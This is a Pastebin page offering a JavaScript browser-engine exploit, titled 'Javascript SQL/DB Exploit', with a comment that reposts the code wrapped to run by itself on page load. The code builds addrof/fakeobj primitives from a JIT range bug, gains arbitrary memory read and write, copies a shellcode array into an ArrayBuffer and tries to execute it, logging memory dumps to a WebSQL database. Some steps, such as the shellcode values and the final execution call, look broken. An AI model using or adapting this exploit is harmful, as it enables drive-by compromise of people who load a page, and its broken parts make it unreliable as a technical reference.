API tools faq
paste
Advertisement
xosski

Javascript SQL/DB Exploit

xosski
Dec 28th, 2024
8
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.22 KB | None | 0 0
raw download clone embed print report
  1. var executableBuffer = new ArrayBuffer(0x1000);
  2. var dataView = new DataView(executableBuffer);
  3.  
  4. var buf = new ArrayBuffer(8);
  5. var f64_buf = new Float64Array(buf);
  6. var u64_buf = new Uint32Array(buf);
  7. let buf2 = new ArrayBuffer(0x150);
  8.  
  9. function initSQLDatabase() {
  10. let db = openDatabase('iu14D2N_SQL', '1.0', 'Memory Database', 2 * 1024 * 1024);
  11.  
  12. db.transaction(function (tx) {
  13. tx.executeSql('CREATE TABLE IF NOT EXISTS memory_dumps (addr TEXT, data TEXT)');
  14. tx.executeSql('CREATE TABLE IF NOT EXISTS shellcode (id TEXT, payload BLOB)');
  15. });
  16. return db;
  17. }
  18.  
  19. function ftoi(val) {
  20. f64_buf[0] = val;
  21. return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
  22. }
  23.  
  24. function itof(val) {
  25. u64_buf[0] = Number(val & 0xffffffffn);
  26. u64_buf[1] = Number(val >> 32n);
  27. return f64_buf[0];
  28. }
  29.  
  30. const _arr = new Uint32Array([2**31]);
  31.  
  32. function foo(a) {
  33. var x = 1;
  34. x = (_arr[0] ^ 0) + 1;
  35. x = Math.abs(x);
  36. x -= 2147483647;
  37. x = Math.max(x, 0);
  38. x -= 1;
  39. if(x==-1) x = 0;
  40. var arr = new Array(x);
  41. arr.shift();
  42. var cor = [1.1, 1.2, 1.3];
  43. return [arr, cor];
  44. }
  45.  
  46. function readMemoryRegion(startAddr, length) {
  47. let result = [];
  48. for(let i = 0n; i < BigInt(length); i++) {
  49. result.push(Number(arbread(startAddr + i)));
  50. }
  51. console.log("[+] Memory region read from", startAddr.toString(16));
  52. return result;
  53. }
  54.  
  55. function dumpMemoryRegion(addr, size) {
  56. let memData = [];
  57. for(let i = 0n; i < BigInt(size); i += 8n) {
  58. let value = arbread(addr + i);
  59. memData.push(value);
  60. }
  61. console.log("[+] Memory dump at", addr.toString(16), ":", memData);
  62. return memData;
  63. }
  64.  
  65. function dumpMemoryRegionToSQL(addr, size, db) {
  66. let memData = dumpMemoryRegion(addr, size);
  67. db.transaction(function (tx) {
  68. tx.executeSql('INSERT INTO memory_dumps (addr, data) VALUES (?, ?)',
  69. [addr.toString(16), JSON.stringify(memData)]);
  70. });
  71. return memData;
  72. }
  73.  
  74. function storeShellcode(db, shellcode) {
  75. db.transaction(function (tx) {
  76. tx.executeSql('INSERT INTO shellcode (id, payload) VALUES (?, ?)',
  77. ['iu14D2N_shellcode', shellcode]);
  78. });
  79. }
  80.  
  81. for(var i=0;i<0x3000;++i)
  82. foo(true);
  83.  
  84. var x = foo(false);
  85. var arr = x[0];
  86. var cor = x[1];
  87.  
  88. const idx = 6;
  89. arr[idx+10] = 0x4242;
  90.  
  91. function addrof(k) {
  92. arr[idx+1] = k;
  93. return ftoi(cor[0]) & 0xffffffffn;
  94. }
  95.  
  96. function fakeobj(k) {
  97. cor[0] = itof(k);
  98. return arr[idx+1];
  99. }
  100.  
  101. var float_array_map = ftoi(cor[3]);
  102.  
  103. var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
  104. var fake = fakeobj(addrof(arr2) + 0x20n);
  105.  
  106. function arbread(addr) {
  107. if (addr % 2n == 0) {
  108. addr += 1n;
  109. }
  110. arr2[1] = itof((2n << 32n) + addr - 8n);
  111. return (fake[0]);
  112. }
  113.  
  114. function arbwrite(addr, val) {
  115. if (addr % 2n == 0) {
  116. addr += 1n;
  117. }
  118. arr2[1] = itof((2n << 32n) + addr - 8n);
  119. fake[0] = itof(BigInt(val));
  120. }
  121.  
  122. function copy_shellcode(addr, shellcode) {
  123. let dataview = new DataView(buf2);
  124. let buf_addr = addrof(buf2);
  125. let backing_store_addr = buf_addr + 0x14n;
  126. arbwrite(backing_store_addr, addr);
  127.  
  128. for (let i = 0; i < shellcode.length; i++) {
  129. dataview.setUint32(4*i, shellcode[i], true);
  130. }
  131. }
  132.  
  133. async function executeExploit() {
  134. let db = initSQLDatabase();
  135. var exec_addr = addrof(executableBuffer) + 0x20n;
  136. console.log("[+] Address of executable region: " + exec_addr.toString(16));
  137.  
  138. dumpMemoryRegionToSQL(exec_addr, 0x100, db);
  139.  
  140. let shellcode = [
  141. 0x90909090,
  142. 0x68434241,
  143. 0x6A00,
  144. 0xB8,
  145. 0x89E5,
  146. 0x31C0,
  147. 0x50,
  148. 0x89E2,
  149. 0x31C9,
  150. 0xB0FF,
  151. 0xC3
  152. ];
  153.  
  154. storeShellcode(db, shellcode);
  155. copy_shellcode(exec_addr, shellcode);
  156.  
  157. let execFunc = new Function('return ' + exec_addr)();
  158. execFunc();
  159. }
  160.  
  161. async function executeCustomExploit() {
  162. console.log("[+] Starting iu14D2N exploit with SQL capabilities...");
  163. await executeExploit();
  164. console.log("[+] Exploit and SQL operations completed");
  165. }
  166.  
  167. executeCustomExploit().catch(error => {
  168. console.log("[!] Exploit failed:", error);
  169. });
  170.  
Advertisement
Comments
  • xosski
    xosski
    21 days
    # text 4.97 KB | 0 0
    view report reply
    1. document.addEventListener('DOMContentLoaded', function() {
    2. executeCustomExploit().catch(error => {
    3. console.log("[!] Exploit failed:", error);
    4. });
    5. });
    6.  
    7. (function() {
    8. var executableBuffer = new ArrayBuffer(0x1000);
    9. var dataView = new DataView(executableBuffer);
    10.  
    11. var buf = new ArrayBuffer(8);
    12. var f64_buf = new Float64Array(buf);
    13. var u64_buf = new Uint32Array(buf);
    14. let buf2 = new ArrayBuffer(0x150);
    15.  
    16. function initSQLDatabase() {
    17. let db = openDatabase('iu14D2N_SQL', '1.0', 'Memory Database', 2 * 1024 * 1024);
    18.  
    19. db.transaction(function (tx) {
    20. tx.executeSql('CREATE TABLE IF NOT EXISTS memory_dumps (addr TEXT, data TEXT)');
    21. tx.executeSql('CREATE TABLE IF NOT EXISTS shellcode (id TEXT, payload BLOB)');
    22. });
    23. return db;
    24. }
    25.  
    26. function ftoi(val) {
    27. f64_buf[0] = val;
    28. return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
    29. }
    30.  
    31. function itof(val) {
    32. u64_buf[0] = Number(val & 0xffffffffn);
    33. u64_buf[1] = Number(val >> 32n);
    34. return f64_buf[0];
    35. }
    36.  
    37. const _arr = new Uint32Array([2**31]);
    38.  
    39. function foo(a) {
    40. var x = 1;
    41. x = (_arr[0] ^ 0) + 1;
    42. x = Math.abs(x);
    43. x -= 2147483647;
    44. x = Math.max(x, 0);
    45. x -= 1;
    46. if(x==-1) x = 0;
    47. var arr = new Array(x);
    48. arr.shift();
    49. var cor = [1.1, 1.2, 1.3];
    50. return [arr, cor];
    51. }
    52.  
    53. function readMemoryRegion(startAddr, length) {
    54. let result = [];
    55. for(let i = 0n; i < BigInt(length); i++) {
    56. result.push(Number(arbread(startAddr + i)));
    57. }
    58. console.log("[+] Memory region read from", startAddr.toString(16));
    59. return result;
    60. }
    61.  
    62. function dumpMemoryRegion(addr, size) {
    63. let memData = [];
    64. for(let i = 0n; i < BigInt(size); i += 8n) {
    65. let value = arbread(addr + i);
    66. memData.push(value);
    67. }
    68. console.log("[+] Memory dump at", addr.toString(16), ":", memData);
    69. return memData;
    70. }
    71.  
    72. function dumpMemoryRegionToSQL(addr, size, db) {
    73. let memData = dumpMemoryRegion(addr, size);
    74. db.transaction(function (tx) {
    75. tx.executeSql('INSERT INTO memory_dumps (addr, data) VALUES (?, ?)',
    76. [addr.toString(16), JSON.stringify(memData)]);
    77. });
    78. return memData;
    79. }
    80.  
    81. function storeShellcode(db, shellcode) {
    82. db.transaction(function (tx) {
    83. tx.executeSql('INSERT INTO shellcode (id, payload) VALUES (?, ?)',
    84. ['iu14D2N_shellcode', shellcode]);
    85. });
    86. }
    87.  
    88. for(var i=0;i<0x3000;++i)
    89. foo(true);
    90.  
    91. var x = foo(false);
    92. var arr = x[0];
    93. var cor = x[1];
    94.  
    95. const idx = 6;
    96. arr[idx+10] = 0x4242;
    97.  
    98. function addrof(k) {
    99. arr[idx+1] = k;
    100. return ftoi(cor[0]) & 0xffffffffn;
    101. }
    102.  
    103. function fakeobj(k) {
    104. cor[0] = itof(k);
    105. return arr[idx+1];
    106. }
    107.  
    108. var float_array_map = ftoi(cor[3]);
    109.  
    110. var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
    111. var fake = fakeobj(addrof(arr2) + 0x20n);
    112.  
    113. function arbread(addr) {
    114. if (addr % 2n == 0) {
    115. addr += 1n;
    116. }
    117. arr2[1] = itof((2n << 32n) + addr - 8n);
    118. return (fake[0]);
    119. }
    120.  
    121. function arbwrite(addr, val) {
    122. if (addr % 2n == 0) {
    123. addr += 1n;
    124. }
    125. arr2[1] = itof((2n << 32n) + addr - 8n);
    126. fake[0] = itof(BigInt(val));
    127. }
    128.  
    129. function copy_shellcode(addr, shellcode) {
    130. let dataview = new DataView(buf2);
    131. let buf_addr = addrof(buf2);
    132. let backing_store_addr = buf_addr + 0x14n;
    133. arbwrite(backing_store_addr, addr);
    134.  
    135. for (let i = 0; i < shellcode.length; i++) {
    136. dataview.setUint32(4*i, shellcode[i], true);
    137. }
    138. }
    139.  
    140. async function executeExploit() {
    141. let db = initSQLDatabase();
    142. var exec_addr = addrof(executableBuffer) + 0x20n;
    143. console.log("[+] Address of executable region: " + exec_addr.toString(16));
    144.  
    145. dumpMemoryRegionToSQL(exec_addr, 0x100, db);
    146.  
    147. let shellcode = [
    148. 0x90909090,
    149. 0x68434241,
    150. 0x6A00,
    151. 0xB8,
    152. 0x89E5,
    153. 0x31C0,
    154. 0x50,
    155. 0x89E2,
    156. 0x31C9,
    157. 0xB0FF,
    158. 0xC3
    159. ];
    160.  
    161. storeShellcode(db, shellcode);
    162. copy_shellcode(exec_addr, shellcode);
    163.  
    164. let execFunc = new Function('return ' + exec_addr)();
    165. execFunc();
    166. }
    167.  
    168. window.executeCustomExploit = async function() {
    169. console.log("[+] Auto-executing iu14D2N exploit...");
    170. await executeExploit();
    171. console.log("[+] Auto-execution completed");
    172. }
    173. })();
    174.  
    175. window.onload = function() {
    176. console.log("[+] Secondary trigger point activated");
    177. executeCustomExploit();
    178. };
    179.  
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!